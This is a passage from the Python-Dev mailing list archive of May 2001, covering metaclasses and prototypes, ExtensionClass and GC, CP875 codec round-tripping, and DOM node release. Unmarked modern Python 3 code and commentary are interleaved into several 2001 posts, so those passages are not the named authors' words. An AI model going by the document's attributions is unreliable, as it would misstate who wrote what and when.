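    # Replace the -c snippet with the script that reproduces the crash.
    result = run_with_malloc_check(
        [sys.executable, "-c", "import os; print(os.environ['MALLOC_CHECK_'])"])
    print(result.returncode, result.stdout.strip())
```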

> Neil and/or Jim (and/or anyone else willing to look into this problem), I
> can give you access to my development machine via ssh if you think that
> would help debug the problem.

I'd be willing to take a look (the chances of me reproducing it
don't look good).  A public RSA key is attached.

  Neil

1024 35 137239219965727437168672191918903379374375693016714793361229775412659825927393161529979393960653570460772264478344617383839228413657344788196731901259658832080205387752175259876861415566787275112151657197829855666024930817293398722707127849748769398037860296053992448539154897117015626552934877126704135564999 nas


From sdm7g at Virginia.EDU  Sat May 12 17:07:06 2001
From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Sat, 12 May 2001 11:07:06 -0400 (EDT)
Subject: [Python-Dev] prototypes (was: Type/class)
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEMBKBAA.tim_one@email.msn.com>
Message-ID: <Pine.NXT.4.21.0105121011450.241-100000@localhost>


[Guido]
> Do prototype-based languages have the equivalent of multiple
> inheritance?
 
Yeah ... What Tim said... 

Also: There are two basic implementation models:

Delegation  [a.k.a. "Lifetime sharing", cloning]
  sort of like python -- if you don't know how to handle it "ask" 
  a parent object. ( "ask" in quotes, because I've recently been
  in a long argument about whether objective-C & smalltalk can
  really be said to "send messages" , or if it's "just" dynamic
  lookup and function application! ) 

Extension  [a.k.a. "Birth sharing", copying, concatenation ]
  more like how I imagine C++ vtables are built -- the python 
  equivalent would be like merging all of the class __dict__'s
  together with name-clash priority going to the nearest
  relative. 

( "Life Sharing" vs. "Birth Sharing" -- is a change in the
  base class after object creation inherited by the object? )
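The "life sharing" vs. "birth sharing" question can be shown with two toy object models in Python. `Delegating` and `Extending` are invented names for this sketch; it is not how any of the languages mentioned below are implemented. Delegation resolves a name in the parent at lookup time, while extension copies the parent's slots once, at creation, with the child's own slots taking priority:

```python
class Delegating:
    """Delegation ("life sharing"): unknown names are asked of the parent."""

    def __init__(self, parent=None, **slots):
        self.parent = parent
        self.slots = dict(slots)

    def get(self, name):
        # Resolved at lookup time, so later changes to the parent are seen.
        if name in self.slots:
            return self.slots[name]
        if self.parent is not None:
            return self.parent.get(name)
        raise KeyError(name)


class Extending:
    """Extension ("birth sharing"): parent slots are merged in at creation."""

    def __init__(self, parent=None, **slots):
        # Resolved once: copy the parent's slots, then let the child's own
        # slots override them (the nearest relative wins a name clash).
        self.slots = dict(parent.slots) if parent is not None else {}
        self.slots.update(slots)

    def get(self, name):
        return self.slots[name]


d_base = Delegating(greeting="hello")
d_child = Delegating(d_base)
e_base = Extending(greeting="hello")
e_child = Extending(e_base)

# Change the "base class" after the children were created.
d_base.slots["greeting"] = "hi"
e_base.slots["greeting"] = "hi"

print(d_child.get("greeting"))  # hi    (delegation sees the change)
print(e_child.get("greeting"))  # hello (extension copied it at birth)
```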

 I think most Multiple-Inheritance languages use delegation, but
there's no reason it wouldn't work with extension. The difference is
that with extension, everything has to get resolved at object creation. 
 Extension could be made more flexible if on creation, you could 
not only add new methods, but rearrange and control the extension
process ( sort of like "from xxx import yyy; from aaa import bbb" ).
 I would think one could use delegation by default, but provide 
an extension mechanism as an optimization, but I don't know if 
there's any system that does this. 

 If it follows the paradigm, a prototype system doesn't have an 
'isa' or '__class__' slot -- only a (linked) list of parent objects.
But if you were simulating class orientation, one would add 
an 'isa' slot for the immediate prototype, and probably enforce
some restrictions on the prototype objects that were playing the
role of class objects. 

 "If it follows the paradigm" -- as in OO in general, there are
several flavors and implementations, and some may be hybrid
systems. 
  Self is the language most widely known as a prototype-based
language; some others are NewtonScript (from Apple's late lamented
Newton palmtop), Kevo (a Forth-based o-o language), Cardelli's
Obliq (This didn't stick in my mind from when I read the papers
back in the "safe python" development days, but it's listed in
my book.) as well as XlispStat's object system. (which isn't 
listed in that book but there is an ObjectLisp -- I don't know
if they were at all related. ) -- and Tim said JavaScript. 
The Amulet and Garnet GUI systems are prototype based -- Garnet
written in Lisp and Amulet in C++. 

 For NewtonScript, Kevo, and maybe JavaScript, I suspect the
simplicity of the system was a motivation. 
 
("the book" I'm reading is "Prototype-Based Programming -- Concepts,
Languages and Applications" ed. James Noble, Antero Taivalsaari, Ivan
Moore, pub. Springer. A collection of papers, some of which are 
available on the Web -- I know the Self papers, one description of
NewtonScript, and one or two articles on Kevo are online, as well
as Cardelli's Obliq paper. )


-- "Steve" Majewski


From martin at loewis.home.cs.tu-berlin.de  Sat May 12 21:16:58 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sat, 12 May 2001 21:16:58 +0200
Subject: [Python-Dev] GC and ExtensionClass
Message-ID: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>

> Has anyone investigated interactions between ExtensionClass objects
> and GC?

At some point, extension classes used a literal copy of
PyTypeObject. Unfortunately, that copy was made with Python 1.4 or so,
and only had the spare fields that were expected then. Today,
PyTypeObject has many more fields, so extension objects produce random
errors (eg. with GC) when used in a modern interpreter (where the copy
has not been synchronized). Whatever immediately follows the type
object in memory may be interpreted as GC flag.

Regards,
Martin


From guido at digicool.com  Sat May 12 23:08:05 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 12 May 2001 16:08:05 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: Your message of "Sat, 12 May 2001 21:16:58 +0200."
             <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> 
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> 
Message-ID: <200105122108.QAA09951@cj20424-a.reston1.va.home.com>

> At some point, extension classes used a literal copy of
> PyTypeObject. Unfortunately, that copy was made with Python 1.4 or so,
> and only had the spare fields that were expected then. Today,
> PyTypeObject has many more fields, so extension objects produce random
> errors (eg. with GC) when used in a modern interpreter (where the copy
> has not been synchronized). Whatever immediately follows the type
> object in memory may be interpreted as GC flag.

Not quite true.  ExtensionClasses (at least recent versions that
worked with 1.5.2) contain a copy of the type object up to and
including the tp_flags field, and the 2.1 code is careful not to use
any newer fields without first checking the corresponding flag bit.

Now, if you are using the 1.4 version of ExtensionClasses you might
not have the tp_flags field either (I don't know, I can't easily
check) but the 1.5.2-compatible version of ExtensionClasses doesn't
even require recompilation to work with Python 2.1.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin at loewis.home.cs.tu-berlin.de  Sat May 12 22:12:39 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sat, 12 May 2001 22:12:39 +0200
Subject: [Python-Dev] Ill-defined encoding for CP875?
Message-ID: <200105122012.f4CKCd201688@mira.informatik.hu-berlin.de>

> But I don't know whether the ambiguity in cp875 is a bug or an
> undocumented feature

The official (as in "as official as it gets") mapping between CP 875
and Unicode is at

http://www.unicode.org/Public/MAPPINGS/VENDORS/MICSFT/EBCDIC/CP875.TXT

This is also the file which served as an input to generate cp875.py.

Character 1A, which is the mapping result of these characters, is
indeed known by the name "SUBSTITUTE", apparently following the
definition in

http://www.its.bldrdoc.gov/fs-1037/dir-035/_5170.htm

# substitute character (SUB): A control character that is used in the
# place of a character that is recognized to be invalid or in error or
# that cannot be represented on a given device.

That would suggest that these characters in EBCDIC 875 do not have
equivalents in Unicode. However,

http://www.kostis.net/charsets/ebc875.htm

suggests that the characters in question (3F, DC, E1, EC, ED, FC, and
FD) have no character meaning at all.

It seems that IBM's ICU library also maps U+001A to character 3F, see

http://oss.software.ibm.com/developerworks/opensource/cvs/icu/data/ibm-875_P100-2000.ucm?rev=1.1&content-type=text/x-cvsweb-markup

It appears, from looking at

http://www.natural-innovations.com/boo/asciiebcdic.html

that byte 3F *is* the substitution character in EBCDIC. So it is a bug
in the CP875 codec to map Unicode SUBSTITUTE to an arbitrary EBCDIC
character which is mapped to SUBSTITUTE; I think cp875 should be
corrected to always map U+001A to 3F. That is not something the
generator can currently do, though.

So I think we can take one of two approaches:

1. admit that CP 875 is not round-trippable, and exclude it from the
   test (although when looking at the first 128 characters only, it
   is round-trippable).
2. remove the SUBSTITUTE mappings from CP875, acknowledging that
   apparently these characters have no meaning in that code page.
   Unfortunately, I could not find any official IBM documentation
   page that lists the characters supported in each of the EBCDIC
   code pages.

The second seems to be more correct to me, although it is a deviation
from the Unicode consortium publications.
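Since cp875.py is machine generated, option 2 would most naturally be applied as a post-processing step on the generated table. A sketch, assuming the codec keeps a plain `decoding_map` dict as cp875.py does; `drop_substitute_aliases` is a hypothetical helper. It keeps byte 0x3F (the EBCDIC substitution character) as the only byte decoding to U+001A and drops the other entries, leaving those bytes undefined:

```python
SUBSTITUTE = 0x1a  # U+001A
EBCDIC_SUB = 0x3f  # byte 3F, the EBCDIC substitution character


def drop_substitute_aliases(decoding_map, canonical=EBCDIC_SUB, target=SUBSTITUTE):
    """Return a copy of decoding_map in which only `canonical` decodes to `target`."""
    return {byte: cp for byte, cp in decoding_map.items()
            if cp != target or byte == canonical}


substitute_entries = {0x3f: 0x1a, 0xdc: 0x1a, 0xe1: 0x1a, 0xec: 0x1a,
                      0xed: 0x1a, 0xfc: 0x1a, 0xfd: 0x1a}
cleaned = drop_substitute_aliases(substitute_entries)
print(cleaned)  # {63: 26}

# With one byte left per code point, inverting the map is unambiguous.
encoding_map = {cp: byte for byte, cp in cleaned.items()}
```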

Regards,
Martin


From guido at digicool.com  Sat May 12 23:21:21 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 12 May 2001 16:21:21 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Sat, 12 May 2001 11:07:06 -0400."
             <Pine.NXT.4.21.0105121011450.241-100000@localhost> 
References: <Pine.NXT.4.21.0105121011450.241-100000@localhost> 
Message-ID: <200105122121.QAA10000@cj20424-a.reston1.va.home.com>

> Also: There are two basic implementation models:
> 
> Delegation  [a.k.a. "Lifetime sharing", cloning]
>   sort of like python -- if you don't know how to handle it "ask" 
>   a parent object. ( "ask" in quotes, because I've recently been
>   in a long argument about whether objective-C & smalltalk can
>   really be said to "send messages" , or if it's "just" dynamic
>   lookup and function application! ) 
> 
> Extension  [a.k.a. "Birth sharing", copying, concatenation ]
>   more like how I imagine C++ vtables are built -- the python 
>   equivalent would be like merging all of the class __dict__'s
>   together with name-clash priority going to the nearest
>   relative. 
> 
> ( "Life Sharing" vs. "Birth Sharing" -- is a change in the
>   base class after object creation inherited by the object? )

Interesting.  So is the rest of this thread, but since Python is not a
prototype language and is unlikely to become one, I'd like to mention
that Python 2.2 will likely allow you to choose either paradigm, on a
per-class basis, using metaclasses.

I'm finding metaclasses in Python useful for different things than
they are in Smalltalk, and I expect that they will continue to play a
less important role.  But they are important because they control many
"policy" aspects of Python classes/types: e.g. whether instances have
a __dict__ or a specific set of slots (maybe even typed slots),
whether changes can be made to a class after it's been created, the
semantics of multiple inheritance, and so on.
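As one illustration of such a policy, here is a metaclass that forbids changing a class after it has been created. This uses the `metaclass=` keyword of today's Python 3, not whatever API the 2.2 work ends up with, and `FrozenClassMeta` is an invented name. Instances of the class are unaffected; only the class object itself is frozen:

```python
class FrozenClassMeta(type):
    """Metaclass whose classes reject attribute changes after creation."""

    def __setattr__(cls, name, value):
        raise TypeError(f"class {cls.__name__} is frozen; cannot set {name!r}")

    def __delattr__(cls, name):
        raise TypeError(f"class {cls.__name__} is frozen; cannot delete {name!r}")


class Point(metaclass=FrozenClassMeta):
    dims = 2


try:
    Point.dims = 3
except TypeError as exc:
    print(exc)  # class Point is frozen; cannot set 'dims'
```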

Right now, my metaclasses continue to be implemented in C, although I
expect that eventually they will be subclassable in Python.  Watch the
descr-branch in the CVS tree.  I hope I'll soon have some time to write
a PEP, too.

It's an interesting journey!  The book I am reading about this:
"Putting Metaclasses to Work" by Ira Forman and Scott Danforth.
http://cseng.awl.com/book/0,3828,0201433052,00.html

--Guido van Rossum (home page: http://www.python.org/~guido/)


From sdm7g at Virginia.EDU  Sat May 12 22:53:26 2001
From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Sat, 12 May 2001 16:53:26 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <200105122121.QAA10000@cj20424-a.reston1.va.home.com>
Message-ID: <Pine.NXT.4.21.0105121640050.261-100000@localhost>


On Sat, 12 May 2001, Guido van Rossum wrote:

> Interesting.  So is the rest of this thread, but since Python is not a
> prototype language and is unlikely to become one, I'd like to mention
> that Python 2.2 will likely allow you to choose either paradigm, on a
> per-class basis, using metaclasses.

 As I said earlier: the only advantage would be if it could simplify 
things "under the hood" (compared to metaclasses) but could still 
provide the same Class semantics (with maybe a "proto" declaration
sneaking its nose in under the tent.) 
 But I have no immediate idea on how to do that, and it sounds like
you're pretty far along into an implementation already. 

> I'm finding metaclasses in Python useful for different things than
> they are in Smalltalk, and I expect that they will continue to play a
> less important role.  But they are important because they control many
> "policy" aspects of Python classes/types: e.g. whether instances have
> a __dict__ or a specific set of slots (maybe even typed slots),
> whether changes can be made to a class after it's been created, the
> semantics of multiple inheritance, and so on.

 I guess my practical question, which I meant to ask before I got
myself sidetracked into preaching prototypes is: How much of the
existing plumbing (specifically the Don Beaudry hack) can I rely
on in the future for the objective-C/python bridge ? 
 With BOOST and Zope's extension classes relying on it, can I 
assume that it's being extended rather than replaced ? 
( I guess I ought to take a look at the code! ) 

> It's an interesting journey!  The book I am reading about this:
> "Putting Metaclasses to Work" by Ira Forman and Scott Danforth.
> http://cseng.awl.com/book/0,3828,0201433052,00.html

Thanks for the reference. 
Talking about interesting journeys: 

 Guido: did you ever imagine back at that first workshop at NIST
that you and Python would be where you are today ? 


-- Steve Majewski 


From gmcm at hypernet.com  Sat May 12 23:09:41 2001
From: gmcm at hypernet.com (Gordon McMillan)
Date: Sat, 12 May 2001 17:09:41 -0400
Subject: [Python-Dev] Type/class
In-Reply-To: <200105122121.QAA10000@cj20424-a.reston1.va.home.com>
References: Your message of "Sat, 12 May 2001 11:07:06 -0400."             <Pine.NXT.4.21.0105121011450.241-100000@localhost> 
Message-ID: <3AFD6E55.1096.B4BFBD3F@localhost>

[Guido]
> It's an interesting journey!  The book I am reading about this:
> "Putting Metaclasses to Work" by Ira Forman and Scott Danforth.
> http://cseng.awl.com/book/0,3828,0201433052,00.html

The two things that struck me most when I read that last year:
 
 - How eminently ill-suited C++ is for this stuff (the book 
develops a framework in C++)

 - a very convincing argument that if you derive C from A and B 
(whose metaclasses are not the same), the system must 
derive a metaclass for C, using MI from A and B's 
metaclasses.
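The derived-metaclass argument can be tried out in modern Python 3, which does not derive the metaclass automatically: it raises a "metaclass conflict" TypeError instead, so the combined metaclass has to be built by hand. `derived_metaclass` below is a hypothetical helper sketching the derivation the book argues for:

```python
class MetaA(type):
    pass


class MetaB(type):
    pass


class A(metaclass=MetaA):
    pass


class B(metaclass=MetaB):
    pass


def derived_metaclass(*bases):
    """Return a metaclass deriving (via MI) from every base's metaclass."""
    metas = []
    for base in bases:
        if type(base) not in metas:
            metas.append(type(base))
    # Keep only the most-derived metaclasses; the others are implied.
    winners = [m for m in metas
               if not any(o is not m and issubclass(o, m) for o in metas)]
    if len(winners) == 1:
        return winners[0]
    return type("_".join(m.__name__ for m in winners), tuple(winners), {})


try:
    class C(A, B):  # Python 3 refuses: the metaclasses are unrelated
        pass
    conflict = False
except TypeError:
    conflict = True


class C(A, B, metaclass=derived_metaclass(A, B)):
    pass


print(conflict, type(C).__name__)  # True MetaA_MetaB
```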

duct-tape-skull-cap-advised-ly y'rs

- Gordon


From tim.one at home.com  Sat May 12 23:22:49 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 12 May 2001 17:22:49 -0400
Subject: [Python-Dev] Ill-defined encoding for CP875?
In-Reply-To: <02e501c0dade$ab7f1080$e46940d5@hagrid>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEMNKBAA.tim.one@home.com>

[/F]
> reverse sorting makes sense to me.  but the cp-files appear to be
> machine generated, so patching that python file won't help.

Agreed.

> a truly future-proof solution would be to specify exactly how to
> resolve every many-to-one mapping, for every font having that
> problem.  but sorting them is clearly better than relying on
> implementation-dependent behaviour...

The attached program suggests the problem is rare; of those encoding files
that have a Python decoding_map dict, only these triggered a meaningful
ambiguity complaint:

*** cp1006.py maps 0xfe8e back to 0xb1, 0xb2
*** cp875.py maps 0x1a back to 0x3f, 0xdc, 0xe1, 0xec, 0xed, 0xfc, 0xfd

Then since test_unicode only checks for roundtrip across range(0x80), cp875
is the only one that *can* fail (the ambiguities in cp1006 are for points >
0x7f, so aren't tested here).

Hmm!  Now I see that in a part of test_unicode that wasn't reached, cp875 and
cp1006 are excluded, with this comment:

    ### These fail the round-trip:
    #'cp1006', 'cp875', 'iso8859_8',

So the practical hack for now is to exclude cp875 from the earlier range(128)
roundtrip test too.
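The practical hack amounts to an exclusion list in front of the round-trip loop. A sketch in modern Python 3 using bytes and str; it does not reproduce test_unicode's actual structure, `roundtrip_failures` and `EXCLUDED` are hypothetical names, and it makes no claim about whether today's cp875 codec still fails:

```python
EXCLUDED = {"cp875"}  # ambiguous reverse mapping for byte 0x3F


def roundtrip_failures(encoding, points=range(128)):
    """Return the byte values in `points` that do not survive decode+encode."""
    failures = []
    for i in points:
        raw = bytes([i])
        try:
            back = raw.decode(encoding).encode(encoding)
        except UnicodeError:
            failures.append(i)
            continue
        if back != raw:
            failures.append(i)
    return failures


for enc in ["ascii", "latin-1", "cp1252", "cp875"]:
    if enc in EXCLUDED:
        continue
    assert not roundtrip_failures(enc), enc
```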

> (is Jython using exactly the same hashing and dictionary algorithms as
> CPython?  or does it work by accident also under Jython?)

Sorry, no idea.  Attempting to browse the Jython source on SourceForge caused
this cute behavior:

http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/jython/jython/Lib/

    Python Exception Occurred

    Traceback (innermost last):
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 2286, in ?
        main()
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 2253, in main
        view_directory(request)
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 1043, in view_directory
        fileinfo, alltags = get_logs(full_name, rcs_files, view_tag)
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 987, in get_logs
        raise 'error during rlog: '+hex(status)
    error during rlog: 0x100

let's-rewrite-it-in-php<wink>-ly y'rs  - tim

ENCODING_DIR = "../Lib/encodings"

import os
import imp

def d(w):
    if type(w) is type(6):
        return hex(w)
    else:
        return repr(w)

encfiles = [name for name in os.listdir(ENCODING_DIR)
                 if name.endswith(".py") and name[0] != "_"]

for fname in encfiles:
    path = os.path.join(ENCODING_DIR, fname)
    f = open(path)
    module = imp.load_source(fname[:-3], path, f)
    f.close()
    decode = getattr(module, "decoding_map", None)
    if decode is None:
        print fname, "doesn't have decoding_map."
        continue
    vtok = {}
    for k, v in decode.items():
        if v in vtok:
            vtok[v].append(k)
        else:
            vtok[v] = [k]
    ambiguous = [(v, ks) for v, ks in vtok.items()
                         if len(ks) > 1]
    if ambiguous:
        for v, ks in ambiguous:
            ks.sort()
            print "***", fname, "maps", d(v), "back to", \
                  ", ".join(map(d, ks))
    else:
        print fname, "is free of ambiguous reverse maps."


From tim.one at home.com  Sat May 12 23:48:38 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 12 May 2001 17:48:38 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <200105122012.f4CKCd201688@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOENCKBAA.tim.one@home.com>

[Martin v. Loewis, whose encyclopedic knowledge of encoding details
 still isn't enough to get a clear answer (it's like somebody asking
 me for a simple answer to a floating point question <wink>)]

> ...
> So I think we can take one of two approaches:
>
> 1. admit that CP 875 is not round-trippable, and exclude it from the
>    test (although when looking at the first 128 characters only, it
>    is round-trippable).

As I noted later, 875 is already excluded from the roundtrip test across
range(128, 256).  What it's failing is the roundtrip test across range(128):
after unicode("?", "cp875") produces u'\x1a', the following .encode('cp875')
has no way to know which range the original input came from.  So it's not
really round-trippable across range(128) either unless more info is given to
.encode().

> 2. remove the SUBSTITUTE mappings from CP875, acknowledging that
>    apparently these characters have no meaning in that code page.
>    Unfortunately, I could not find any official IBM documentation
>    page that lists the characters supported in each of the EBCDIC
>    code pages.
>
> The second seems to be more correct to me, although it is a deviation
> from the Unicode consortium publications.

Until you and MAL agree on the best thing to do (I have no opinion:  my only
exposure to Unicode in daily programming life remains the Python test suite),
I'm going to opt for #1:  as cp875.py stands today, it's simply a fact that
it's not round-trippable across any range including 0x3f.


From martin at loewis.home.cs.tu-berlin.de  Sun May 13 00:32:10 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 13 May 2001 00:32:10 +0200
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <200105122108.QAA09951@cj20424-a.reston1.va.home.com> (message
	from Guido van Rossum on Sat, 12 May 2001 16:08:05 -0500)
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com>
Message-ID: <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>

> Now, if you are using the 1.4 version of ExtensionClasses you might
> not have the tp_flags field either (I don't know, I can't easily
> check) but the 1.5.2-compatible version of ExtensionClasses doesn't
> even require recompilation to work with Python 2.1.

I'll attach a copy below of the struct as defined in
pygtk-0.7.0-unstable-dont-use.tar.gz (0.6.6 does not use extension
classes). As you can see, it does not provide tp_flags, but has a
field of tp_xxx4 for it.

That *should* work, except that it also has its 'methods' field where
tp_traverse would go, and its class_flags field where tp_clear would
go.

Now, you write

> ExtensionClasses (at least recent versions that worked with 1.5.2)
> contain a copy of the type object up to and including the tp_flags
> field, and the 2.1 code is careful not to use any newer fields
> without first checking the corresponding flag bit.

In this generality, it is apparently not true: Modules/gcmodule.c has,
in delete_garbage,

			if ((clear = op->ob_type->tp_clear) != NULL) {
...
		traverse = PyObject_FROM_GC(gc)->ob_type->tp_traverse;
		(void) traverse(PyObject_FROM_GC(gc),
			       (visitproc)visit_decref,
			       NULL);

which does not check any flags. That still shouldn't cause any
problems, since the Gtk objects should never end up in the GC lists -
but maybe I'm missing something.

Regards,
Martin

typedef struct {
	PyObject_VAR_HEAD
	char *tp_name; /* For printing */
	int tp_basicsize, tp_itemsize; /* For allocation */
	
	/* Methods to implement standard operations */
	
	destructor tp_dealloc;
	printfunc tp_print;
	getattrfunc tp_getattr;
	setattrfunc tp_setattr;
	cmpfunc tp_compare;
	reprfunc tp_repr;
	
	/* Method suites for standard classes */
	
	PyNumberMethods *tp_as_number;
	PySequenceMethods *tp_as_sequence;
	PyMappingMethods *tp_as_mapping;

	/* More standard operations (at end for binary compatibility) */

	hashfunc tp_hash;
	ternaryfunc tp_call;
	reprfunc tp_str;
	getattrofunc tp_getattro;
	setattrofunc tp_setattro;
	/* Space for future expansion */
	long tp_xxx3;
	long tp_xxx4;

	char *tp_doc; /* Documentation string */

#ifdef COUNT_ALLOCS
	/* these must be last */
	int tp_alloc;
	int tp_free;
	int tp_maxalloc;
	struct _typeobject *tp_next;
#endif
  PyMethodChain methods;
  long class_flags;
  PyObject *class_dictionary;
  PyObject *bases;
  PyObject *reserved;
} PyExtensionClass;


From martin at loewis.home.cs.tu-berlin.de  Sun May 13 14:08:02 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 13 May 2001 14:08:02 +0200
Subject: [Python-Dev] ReleaseNode interface in 4XSLT
Message-ID: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de>

Currently, 4XSLT has a dependency on the DOM implementation in terms
of memory management (among other dependencies). I'd like to reduce
this dependency, by providing a centralized function that knows how to
release nodes.

In PyXML, I currently use

# Define ReleaseNode in a DOM-independent way
import xml.dom.ext
import xml.dom.minidom
def _releasenode(n):
    if isinstance(n, xml.dom.minidom.Node):
        n.unlink()
    else:
        xml.dom.ext.ReleaseNode(n)

try:
    from Ft.Lib import pDomlette
    def ReleaseNode(n):
        if isinstance(n, pDomlette.Node):
            pDomlette.ReleaseNode(n)
        else:
            _releasenode(n)
    _XsltElementBase = pDomlette.Element
except ImportError:
    ReleaseNode = _releasenode
    from minisupport import _XsltElementBase

This code knows how to release minidom, 4DOM, and pDomlette nodes, and
supports installations without 4Suite (i.e. without pDomlette). I've
put this into xslt/__init__.py, so that all callers of
Ft.Lib.pDomlette.ReleaseNode now need to call xml.xslt.ReleaseNode.
If desired, I could produce a patch against the public Ft CVS.

As a slightly independent question, such a function also ought to
support DOM implementations not known to it; I'm thinking in
particular of the Zope DOMs. I'd like to hear proposals on how such an
interface should work; I see three options:

a) it is an operation on the document node (or any node), as in minidom.
b) it is an operation on the DOM implementation (almost as in 4Suite;
   you'd need to navigate from the node to the implementation, then
   you'd need a well-known operation on the implementation)
c) the code assumes that no release activity is necessary for unknown
   DOMs, effectively believing in reference counting, garbage collection,
   acquisition, and other black art.
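One way the three options might be combined is a dispatcher that tries, in order, an implementation that has registered itself (in the spirit of (b)), a release method on the node itself (option (a), as with minidom's `Node.unlink()`), and finally nothing at all (option (c)). `register_releaser` and `release_node` are hypothetical names for this sketch, not PyXML or 4Suite APIs, and the node classes are stand-ins:

```python
_releasers = []  # (node_class, release_function) pairs, checked in order


def register_releaser(node_class, release):
    """Let a DOM implementation announce how its nodes are released."""
    _releasers.append((node_class, release))


def release_node(node):
    # 1. An implementation that registered itself gets first say.
    for node_class, release in _releasers:
        if isinstance(node, node_class):
            release(node)
            return
    # 2. Option (a): a release operation on the node itself.
    unlink = getattr(node, "unlink", None)
    if callable(unlink):
        unlink()
        return
    # 3. Option (c): assume reference counting / GC will clean up.


class FakeMinidomNode:  # stand-in for a node with an unlink() method
    def __init__(self):
        self.unlinked = False

    def unlink(self):
        self.unlinked = True


class FakeDomletteNode:  # stand-in for a node released by its implementation
    released = False


register_releaser(FakeDomletteNode, lambda n: setattr(n, "released", True))
```

Unknown DOMs then cost nothing, and an implementation such as a Zope DOM could opt in by registering itself.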

Any comments appreciated, in particular
1. from the Ft maintainers on introducing xml.xslt.ReleaseNode, and
2. from authors of other DOMs on a general memory management API for
   Python DOM.

Regards,
Martin


From mwh at python.net  Sun May 13 14:36:26 2001
From: mwh at python.net (Michael Hudson)
Date: 13 May 2001 13:36:26 +0100
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: "M.-A. Lemburg"'s message of "Fri, 11 May 2001 12:07:40 +0200"
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> <3AFBB9EC.F75C158D@lemburg.com>
Message-ID: <m31yptqvcl.fsf@atrus.jesus.cam.ac.uk>

"M.-A. Lemburg" <mal at lemburg.com> writes:

> Fredrik Lundh wrote:
> > can you take that again?  shouldn't michael's example be
> > equivalent to:
> > 
> >     unicode(u"\u00e3".encode("latin-1"), "latin-1")
> > 
> > if not, I'd argue that your "decode" design is broken, instead
> > of just buggy...
> 
> Well, it is sort of broken, I agree. The reason is that 
> PyString_Encode() and PyString_Decode() guarantee the returned
> object to be a string object. To be able to reuse Unicode codecs
> I added code which converts Unicode back to a string in case the
codec returns a Unicode object (which the .decode() method does).
> This is what's failing.

It strikes me that if someone executes

aString.decode("latin-1")

they're going to expect a unicode string.  AIUI, what's currently
happening is that the string is converted from a latin-1 8-bit string
to the 16-bit unicode string I expected and then there is an attempt
to convert it back to an 8-bit string using the default encoding.  So
if I'd done a 

sys.setdefaultencoding("latin-1")

in my sitecustomize.py, then aString.decode("latin-1") would just be
aString again?  This doesn't seem optimal.

> Perhaps I should simply remove the restriction and have both APIs
> return the codec's return object as-is ?! (I would be in favour of
> this, but I'm not sure whether this is already in use by someone...)

Are all the codecs distributed with Python 2.1 unicode-related?  If
that's the case, PyString_Decode isn't terribly useful is it?  It
seems unlikely that it received much use.  Could be wrong of course.

OTOH, maybe I'm trying to wedge too much behaviour onto a particular
operation.  Do we want

open(file).read().decode("jpeg") -> some kind of PIL object

to be possible?

Cheers,
M.

-- 
  GET   *BONK*
  BACK  *BONK*
  IN    *BONK*
  THERE *BONK*             -- Naich using the troll hammer in cam.misc


From mal at lemburg.com  Sun May 13 18:53:55 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 13 May 2001 18:53:55 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> <3AFBB9EC.F75C158D@lemburg.com> <m31yptqvcl.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <3AFEBC22.1F0AF685@lemburg.com>

Michael Hudson wrote:
> 
> "M.-A. Lemburg" <mal at lemburg.com> writes:
> 
> > Fredrik Lundh wrote:
> > > can you take that again?  shouldn't michael's example be
> > > equivalent to:
> > >
> > >     unicode(u"\u00e3".encode("latin-1"), "latin-1")
> > >
> > > if not, I'd argue that your "decode" design is broken, instead
> > > of just buggy...
> >
> > Well, it is sort of broken, I agree. The reason is that
> > PyString_Encode() and PyString_Decode() guarantee the returned
> > object to be a string object. To be able to reuse Unicode codecs
> > I added code which converts Unicode back to a string in case the
> > codec returns a Unicode object (which the .decode() method does).
